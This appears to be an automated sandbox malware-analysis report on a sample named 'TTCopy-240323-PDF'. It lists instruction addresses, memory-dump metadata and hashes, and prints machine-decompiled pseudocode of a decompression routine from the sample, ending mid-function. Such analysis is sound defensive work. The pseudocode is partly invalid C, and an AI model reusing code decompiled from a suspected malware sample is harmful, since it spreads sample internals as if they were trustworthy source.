                                                                                            0x00406eea
                                                                                            0x00406eed
                                                                                            0x00406ef0
                                                                                            0x00406ef3
                                                                                            0x00406ef6
                                                                                            0x00406ef9
                                                                                            0x00406efc
                                                                                            0x00406f14
                                                                                            0x00406f17
                                                                                            0x00406f1a
                                                                                            0x00406f1d
                                                                                            0x00406f1d
                                                                                            0x00406f20
                                                                                            0x00406f24
                                                                                            0x00406f26
                                                                                            0x00406efe
                                                                                            0x00406efe
                                                                                            0x00406f06
                                                                                            0x00406f0b
                                                                                            0x00406f0d
                                                                                            0x00406f0f
                                                                                            0x00406f0f
                                                                                            0x00406f29
                                                                                            0x00406f30
                                                                                            0x00406f33
                                                                                            0x00000000
                                                                                            0x00406f35
                                                                                            0x00406f35
                                                                                            0x00000000
                                                                                            0x00406f35
                                                                                            0x00406f33
                                                                                            0x00406f3a
                                                                                            0x00406f3a
                                                                                            0x00406f3a
                                                                                            0x00406f3a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406f75
                                                                                            0x00406f75
                                                                                            0x00406f79
                                                                                            0x00407581
                                                                                            0x00407581
                                                                                            0x00000000
                                                                                            0x00407581
                                                                                            0x00406f7f
                                                                                            0x00406f7f
                                                                                            0x00406f82
                                                                                            0x00406f85
                                                                                            0x00406f89
                                                                                            0x00406f8c
                                                                                            0x00406f92
                                                                                            0x00406f94
                                                                                            0x00406f94
                                                                                            0x00406f94
                                                                                            0x00406f97
                                                                                            0x00406f9a
                                                                                            0x00406f9a
                                                                                            0x00406fa0
                                                                                            0x00406f3e
                                                                                            0x00406f3e
                                                                                            0x00406f41
                                                                                            0x00000000
                                                                                            0x00406f41
                                                                                            0x00406fa2
                                                                                            0x00406fa2
                                                                                            0x00406fa5
                                                                                            0x00406fa8
                                                                                            0x00406fab
                                                                                            0x00406fae
                                                                                            0x00406fb1
                                                                                            0x00406fb4
                                                                                            0x00406fb7
                                                                                            0x00406fba
                                                                                            0x00406fbd
                                                                                            0x00406fc0
                                                                                            0x00406fd8
                                                                                            0x00406fdb
                                                                                            0x00406fde
                                                                                            0x00406fe1
                                                                                            0x00406fe1
                                                                                            0x00406fe4
                                                                                            0x00406fe8
                                                                                            0x00406fea
                                                                                            0x00406fc2
                                                                                            0x00406fc2
                                                                                            0x00406fca
                                                                                            0x00406fcf
                                                                                            0x00406fd1
                                                                                            0x00406fd3
                                                                                            0x00406fd3
                                                                                            0x00406fed
                                                                                            0x00406ff4
                                                                                            0x00406ff7
                                                                                            0x00000000
                                                                                            0x00406ff9
                                                                                            0x00406ff9
                                                                                            0x00000000
                                                                                            0x00406ff9
                                                                                            0x00000000
                                                                                            0x00407286
                                                                                            0x00407286
                                                                                            0x0040728a
                                                                                            0x004075b1
                                                                                            0x004075b1
                                                                                            0x00000000
                                                                                            0x004075b1
                                                                                            0x00407290
                                                                                            0x00407290
                                                                                            0x00407293
                                                                                            0x00407296
                                                                                            0x0040729a
                                                                                            0x0040729d
                                                                                            0x004072a3
                                                                                            0x004072a5
                                                                                            0x004072a5
                                                                                            0x004072a5
                                                                                            0x004072a8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407056
                                                                                            0x00407056
                                                                                            0x00407059
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407395
                                                                                            0x00407395
                                                                                            0x00407399
                                                                                            0x004073bb
                                                                                            0x004073bb
                                                                                            0x004073be
                                                                                            0x004073c8
                                                                                            0x004073cb
                                                                                            0x004073cb
                                                                                            0x00000000
                                                                                            0x004073cb
                                                                                            0x0040739b
                                                                                            0x0040739b
                                                                                            0x0040739e
                                                                                            0x004073a2
                                                                                            0x004073a5
                                                                                            0x004073a5
                                                                                            0x004073a8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407452
                                                                                            0x00407452
                                                                                            0x00407456
                                                                                            0x00407474
                                                                                            0x00407474
                                                                                            0x00407474
                                                                                            0x00407474
                                                                                            0x0040747b
                                                                                            0x00407482
                                                                                            0x00407489
                                                                                            0x00407489
                                                                                            0x00407490
                                                                                            0x00407493
                                                                                            0x0040749a
                                                                                            0x00000000
                                                                                            0x0040749d
                                                                                            0x00407458
                                                                                            0x00407458
                                                                                            0x0040745b
                                                                                            0x0040745e
                                                                                            0x00407461
                                                                                            0x00407468
                                                                                            0x004073ac
                                                                                            0x004073ac
                                                                                            0x004073af
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407543
                                                                                            0x00407543
                                                                                            0x00407546
                                                                                            0x00407447
                                                                                            0x00407447
                                                                                            0x00407447
                                                                                            0x00000000
                                                                                            0x0040744d
                                                                                            0x00000000
                                                                                            0x0040717d
                                                                                            0x0040717d
                                                                                            0x0040717f
                                                                                            0x00407186
                                                                                            0x00407187
                                                                                            0x00407189
                                                                                            0x0040718c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407490
                                                                                            0x00407490
                                                                                            0x00407493
                                                                                            0x0040749a
                                                                                            0x00000000
                                                                                            0x0040749d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004071c2
                                                                                            0x004071c2
                                                                                            0x004071c5
                                                                                            0x004071fb
                                                                                            0x004071fb
                                                                                            0x0040732b
                                                                                            0x0040732b
                                                                                            0x0040732b
                                                                                            0x0040732b
                                                                                            0x0040732e
                                                                                            0x0040732e
                                                                                            0x00407331
                                                                                            0x00407333
                                                                                            0x004075bd
                                                                                            0x004075bd
                                                                                            0x00000000
                                                                                            0x004075bd
                                                                                            0x00407339
                                                                                            0x00407339
                                                                                            0x0040733c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407342
                                                                                            0x00407342
                                                                                            0x00407346
                                                                                            0x00407349
                                                                                            0x00407349
                                                                                            0x00407349
                                                                                            0x00000000
                                                                                            0x00407349
                                                                                            0x004071c7
                                                                                            0x004071c7
                                                                                            0x004071c9
                                                                                            0x004071cb
                                                                                            0x004071cd
                                                                                            0x004071d0
                                                                                            0x004071d1
                                                                                            0x004071d3
                                                                                            0x004071d5
                                                                                            0x004071d8
                                                                                            0x004071db
                                                                                            0x004071f1
                                                                                            0x004071f1
                                                                                            0x004071f6
                                                                                            0x0040722e
                                                                                            0x0040722e
                                                                                            0x00407232
                                                                                            0x0040725b
                                                                                            0x0040725e
                                                                                            0x00407260
                                                                                            0x00407267
                                                                                            0x0040726a
                                                                                            0x0040726d
                                                                                            0x0040726d
                                                                                            0x00407272
                                                                                            0x00407272
                                                                                            0x00407274
                                                                                            0x00407277
                                                                                            0x0040727e
                                                                                            0x00407281
                                                                                            0x004072ae
                                                                                            0x004072ae
                                                                                            0x004072b1
                                                                                            0x004072b4
                                                                                            0x00407328
                                                                                            0x00407328
                                                                                            0x00407328
                                                                                            0x00407328
                                                                                            0x00000000
                                                                                            0x00407328
                                                                                            0x004072b6
                                                                                            0x004072b6
                                                                                            0x004072bc
                                                                                            0x004072bf
                                                                                            0x004072c2
                                                                                            0x004072c5
                                                                                            0x004072c8
                                                                                            0x004072cb
                                                                                            0x004072ce
                                                                                            0x004072d1
                                                                                            0x004072d4
                                                                                            0x004072d7
                                                                                            0x004072f0
                                                                                            0x004072f2
                                                                                            0x004072f5
                                                                                            0x004072f6
                                                                                            0x004072f9
                                                                                            0x004072fb
                                                                                            0x004072fe
                                                                                            0x00407300
                                                                                            0x00407302
                                                                                            0x00407305
                                                                                            0x00407307
                                                                                            0x0040730a
                                                                                            0x0040730e
                                                                                            0x00407310
                                                                                            0x00407310
                                                                                            0x00407311
                                                                                            0x00407314
                                                                                            0x00407317
                                                                                            0x004072d9
                                                                                            0x004072d9
                                                                                            0x004072e1
                                                                                            0x004072e6
                                                                                            0x004072e8
                                                                                            0x004072eb
                                                                                            0x004072eb
                                                                                            0x0040731a
                                                                                            0x00407321
                                                                                            0x004072ab
                                                                                            0x004072ab
                                                                                            0x004072ab
                                                                                            0x004072ab
                                                                                            0x00000000
                                                                                            0x00407323
                                                                                            0x00407323
                                                                                            0x00000000
                                                                                            0x00407323
                                                                                            0x00407321
                                                                                            0x00407234
                                                                                            0x00407234
                                                                                            0x00407237
                                                                                            0x00407239
                                                                                            0x0040723c
                                                                                            0x0040723f
                                                                                            0x00407242
                                                                                            0x00407244
                                                                                            0x00407247
                                                                                            0x0040724a
                                                                                            0x0040724a
                                                                                            0x0040724d
                                                                                            0x0040724d
                                                                                            0x00407250
                                                                                            0x00407257
                                                                                            0x0040722b
                                                                                            0x0040722b
                                                                                            0x0040722b
                                                                                            0x0040722b
                                                                                            0x00000000
                                                                                            0x00407259
                                                                                            0x00407259
                                                                                            0x00000000
                                                                                            0x00407259
                                                                                            0x00407257
                                                                                            0x004071dd
                                                                                            0x004071dd
                                                                                            0x004071e0
                                                                                            0x004071e2
                                                                                            0x004071e5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406f44
                                                                                            0x00406f44
                                                                                            0x00406f48
                                                                                            0x0040758d
                                                                                            0x0040758d
                                                                                            0x00000000
                                                                                            0x0040758d
                                                                                            0x00406f4e
                                                                                            0x00406f4e
                                                                                            0x00406f51
                                                                                            0x00406f54
                                                                                            0x00406f57
                                                                                            0x00406f5a
                                                                                            0x00406f5d
                                                                                            0x00406f60
                                                                                            0x00406f62
                                                                                            0x00406f65
                                                                                            0x00406f68
                                                                                            0x00406f6b
                                                                                            0x00406f6d
                                                                                            0x00406f6d
                                                                                            0x00406f6d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004070cf
                                                                                            0x004070cf
                                                                                            0x004070d3
                                                                                            0x00407599
                                                                                            0x00407599
                                                                                            0x00000000
                                                                                            0x00407599
                                                                                            0x004070d9
                                                                                            0x004070d9
                                                                                            0x004070dc
                                                                                            0x004070df
                                                                                            0x004070e2
                                                                                            0x004070e4
                                                                                            0x004070e4
                                                                                            0x004070e4
                                                                                            0x004070e7
                                                                                            0x004070ea
                                                                                            0x004070ed
                                                                                            0x004070f0
                                                                                            0x004070f3
                                                                                            0x004070f6
                                                                                            0x004070f7
                                                                                            0x004070f9
                                                                                            0x004070f9
                                                                                            0x004070f9
                                                                                            0x004070fc
                                                                                            0x004070ff
                                                                                            0x00407102
                                                                                            0x00407105
                                                                                            0x00407105
                                                                                            0x00407105
                                                                                            0x00407108
                                                                                            0x0040710a
                                                                                            0x0040710a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040734c
                                                                                            0x0040734c
                                                                                            0x0040734c
                                                                                            0x00407350
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407356
                                                                                            0x00407356
                                                                                            0x00407359
                                                                                            0x0040735c
                                                                                            0x0040735f
                                                                                            0x00407361
                                                                                            0x00407361
                                                                                            0x00407361
                                                                                            0x00407364
                                                                                            0x00407367
                                                                                            0x0040736a
                                                                                            0x0040736d
                                                                                            0x00407370
                                                                                            0x00407373
                                                                                            0x00407374
                                                                                            0x00407376
                                                                                            0x00407376
                                                                                            0x00407376
                                                                                            0x00407379
                                                                                            0x0040737c
                                                                                            0x0040737f
                                                                                            0x00407382
                                                                                            0x00407385
                                                                                            0x00407389
                                                                                            0x0040738b
                                                                                            0x0040738e
                                                                                            0x00000000
                                                                                            0x00407390
                                                                                            0x00407390
                                                                                            0x0040710d
                                                                                            0x0040710d
                                                                                            0x00000000
                                                                                            0x0040710d
                                                                                            0x0040738e
                                                                                            0x004075c3
                                                                                            0x004075c3
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406bf2
                                                                                            0x004075fa
                                                                                            0x004075fa
                                                                                            0x00000000
                                                                                            0x004075fa
                                                                                            0x00407447
                                                                                            0x004074c7
                                                                                            0x00407490

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                            • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                                                            • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                            • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 98%
                                                                                            			E00407395() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
